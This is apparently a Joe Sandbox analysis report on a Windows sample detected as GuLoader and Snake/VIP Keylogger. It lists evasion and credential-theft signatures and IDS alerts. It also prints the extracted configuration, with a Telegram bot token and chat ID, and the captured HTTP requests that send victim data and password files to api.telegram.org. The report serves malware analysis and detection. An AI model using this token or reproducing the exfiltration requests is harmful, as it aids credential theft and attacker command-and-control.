Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CWu89IbJQw.exe

Overview

General Information

Sample name:CWu89IbJQw.exe
renamed because original name is a hash value
Original sample name:5640ccd0ee04ad06f40157dfe13ae0ae86ae8c28b03e51fecfa79461afe2f192.exe
Analysis ID:1632319
MD5:23f61592f215c6428cbc1d0890dc12be
SHA1:1acff1da9edf7d59569e90c2ea5b406190f24985
SHA256:5640ccd0ee04ad06f40157dfe13ae0ae86ae8c28b03e51fecfa79461afe2f192
Tags:exesignedVIPKeyloggeruser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious PE digital signature
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • CWu89IbJQw.exe (PID: 6772 cmdline: "C:\Users\user\Desktop\CWu89IbJQw.exe" MD5: 23F61592F215C6428CBC1D0890DC12BE)
    • CWu89IbJQw.exe (PID: 2628 cmdline: "C:\Users\user\Desktop\CWu89IbJQw.exe" MD5: 23F61592F215C6428CBC1D0890DC12BE)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"C2 url": "https://api.telegram.org/bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendMessage"}
{"Exfil Mode": "Telegram", "Bot Token": "7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg", "Chat id": "744079942"}
{"Exfil Mode": "Telegram", "Token": "7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg", "Chat_id": "744079942", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    0000000C.00000002.3609880075.000000003509E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
      0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000000.00000002.2517702962.0000000003331000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          0000000C.00000002.3585420008.00000000022C1000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 2 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:18:04.361584+010028033053Unknown Traffic192.168.2.1149711104.21.112.1443TCP
            2025-03-07T22:18:16.448927+010028033053Unknown Traffic192.168.2.1149719104.21.112.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:17:59.511483+010028032742Potentially Bad Traffic192.168.2.1149709132.226.8.16980TCP
            2025-03-07T22:18:02.246039+010028032742Potentially Bad Traffic192.168.2.1149709132.226.8.16980TCP
            2025-03-07T22:18:05.355242+010028032742Potentially Bad Traffic192.168.2.1149712132.226.8.16980TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:17:52.263107+010028032702Potentially Bad Traffic192.168.2.1149707142.250.185.142443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:18:35.483748+010018100081Potentially Bad Traffic192.168.2.1149727149.154.167.220443TCP
            2025-03-07T22:18:39.384390+010018100081Potentially Bad Traffic192.168.2.1149728149.154.167.220443TCP
            2025-03-07T22:18:43.322869+010018100081Potentially Bad Traffic192.168.2.1149729149.154.167.220443TCP
            2025-03-07T22:18:47.327317+010018100081Potentially Bad Traffic192.168.2.1149730149.154.167.220443TCP
            2025-03-07T22:18:51.245886+010018100081Potentially Bad Traffic192.168.2.1149731149.154.167.220443TCP
            2025-03-07T22:18:55.024237+010018100081Potentially Bad Traffic192.168.2.1149732149.154.167.220443TCP
            2025-03-07T22:18:58.910749+010018100081Potentially Bad Traffic192.168.2.1149733149.154.167.220443TCP
            2025-03-07T22:19:04.185987+010018100081Potentially Bad Traffic192.168.2.1149734149.154.167.220443TCP
            2025-03-07T22:19:08.056419+010018100081Potentially Bad Traffic192.168.2.1149735149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-07T22:18:27.900214+010018100071Potentially Bad Traffic192.168.2.1149726149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: CWu89IbJQw.exeAvira: detected
            Source: 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "Telegram", "Bot Token": "7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg", "Chat id": "744079942"}
            Source: 0000000C.00000002.3609880075.0000000034EB1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg", "Chat_id": "744079942", "Version": "4.4"}
            Source: CWu89IbJQw.exe.2628.12.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendMessage"}
            Source: CWu89IbJQw.exeReversingLabs: Detection: 70%
            Source: CWu89IbJQw.exeVirustotal: Detection: 72%Perma Link
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_380887A8 CryptUnprotectData,12_2_380887A8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_38088EF1 CryptUnprotectData,12_2_38088EF1
            Source: CWu89IbJQw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.112.1:443 -> 192.168.2.11:49710 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.2.11:49707 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.185.225:443 -> 192.168.2.11:49708 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:49726 version: TLS 1.2
            Source: CWu89IbJQw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeDirectory queried: number of queries: 1001
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_0040646B FindFirstFileA,FindClose,12_2_0040646B
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_004027A1 FindFirstFileA,12_2_004027A1
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 12_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,12_2_004058BF
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCacheJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 0458F45Dh12_2_0458F4AC
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 0458F45Dh12_2_0458F2C0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 0458FC19h12_2_0458F961
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E93308h12_2_37E92EF0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E92D41h12_2_37E92A90
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E9F781h12_2_37E9F4D8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E9EA79h12_2_37E9E7D0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E9E621h12_2_37E9E378
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E9E1C9h12_2_37E9DF20
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E90D0Dh12_2_37E90B30
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E916F8h12_2_37E90B30
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E9DD71h12_2_37E9DAC8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E9D919h12_2_37E9D670
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_37E90673
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E93308h12_2_37E93236
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E9D4C1h12_2_37E9D218
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E9D069h12_2_37E9CDC0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E9FBD9h12_2_37E9F930
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E9F329h12_2_37E9F080
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_37E90040
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h12_2_37E90853
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 37E9EED1h12_2_37E9EC28
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38087EB5h12_2_38087B78
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808C070h12_2_3808BDA0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38089280h12_2_38088FB0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380832B1h12_2_38083008
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808D2D0h12_2_3808D000
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38086CC1h12_2_38086A18
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808A4E0h12_2_3808A210
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808F2F8h12_2_3808F028
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380848C9h12_2_38084620
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808C508h12_2_3808C238
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380862D9h12_2_38086030
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38089718h12_2_38089448
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380802E9h12_2_38080040
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38081CF9h12_2_38081A50
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38083709h12_2_38083460
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808E530h12_2_3808E260
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38084D21h12_2_38084A78
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808B740h12_2_3808B470
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38087119h12_2_38086E70
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38086733h12_2_38086488
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38080741h12_2_38080498
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808D768h12_2_3808D498
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38082151h12_2_38081EA8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808A978h12_2_3808A6A8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38087571h12_2_380872C8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808F790h12_2_3808F4C0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38085179h12_2_38084ED0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808C9A0h12_2_3808C6D0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38089BB0h12_2_380898E0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808E9C8h12_2_3808E6F8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38080B99h12_2_380808F0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808BBD8h12_2_3808B908
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380825A9h12_2_38082300
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380855D1h12_2_38085328
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380879C9h12_2_38087720
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808DC00h12_2_3808D930
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38080FF1h12_2_38080D48
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808AE10h12_2_3808AB40
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38082A01h12_2_38082758
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808FC00h12_2_3808F958
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808CE38h12_2_3808CB68
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808A048h12_2_38089D78
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38085A29h12_2_38085780
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808EE60h12_2_3808EB90
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38081449h12_2_380811A0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38082E59h12_2_38082BB0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808E098h12_2_3808DDC8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 3808B2A8h12_2_3808AFD8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38085E81h12_2_38085BD8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380818A1h12_2_380815F8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FAF41h12_2_380FAC48
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F4401h12_2_380F4090
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F7AA9h12_2_380F77B0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F4AD9h12_2_380F47E0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F10D8h12_2_380F0E08
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F8901h12_2_380F8608
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FF6F9h12_2_380FF400
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F5DF9h12_2_380F5B00
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F27D0h12_2_380F2500
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FDF11h12_2_380FDC18
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FB409h12_2_380FB110
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F9C21h12_2_380F9928
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F7119h12_2_380F6E20
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F1A08h12_2_380F1738
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F5931h12_2_380F5638
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FF231h12_2_380FEF38
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F3100h12_2_380F2E30
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FC729h12_2_380FC430
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F0310h12_2_380F0040
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F8439h12_2_380F8140
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F6C51h12_2_380F6958
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FDA49h12_2_380FD750
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F2338h12_2_380F2068
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FC261h12_2_380FBF68
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F3A30h12_2_380F3760
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F9759h12_2_380F9460
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F7F71h12_2_380F7C78
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FED69h12_2_380FEA70
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F5469h12_2_380F5170
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F0C40h12_2_380F0970
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FD581h12_2_380FD288
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FAA79h12_2_380FA780
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F2C69h12_2_380F2998
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F9291h12_2_380F8F98
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F6789h12_2_380F6490
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FE8A2h12_2_380FE5A8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F4FA1h12_2_380F4CA8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F1570h12_2_380F12A0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FBD99h12_2_380FBAA0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FA5B1h12_2_380FA2B8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F62C1h12_2_380F5FC8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F3598h12_2_380F32C8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FFBC1h12_2_380FF8C8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FD0B9h12_2_380FCDC0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F07A8h12_2_380F04D8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FB8D1h12_2_380FB5D8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F1EA0h12_2_380F1BD0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F8DC9h12_2_380F8AD0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F75E1h12_2_380F72E8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FE3D9h12_2_380FE0E0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380F3EC8h12_2_380F3BF8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FCBF1h12_2_380FC8F8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 380FA0E9h12_2_380F9DF0
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then add dword ptr [ebp-0Ch], 01h12_2_3811C0B8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_3811FAB8
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]12_2_3811FAAE
            Source: C:\Users\user\Desktop\CWu89IbJQw.exeCode function: 4x nop then jmp 38120339h12_2_38120040

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49728 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49727 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49733 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49732 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49734 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49730 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49731 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49729 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.11:49726 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.11:49735 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:841675%0D%0ADate%20and%20Time:%2008/03/2025%20/%2019:00:49%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20841675%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7860252135:AAFnqHLJ-Ng3O61cPpFaVL17gS5Ru2j08qg/sendDocument?chat_id=744079942&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5ef2e8206767Host: api.telegram.orgContent-Length: 582
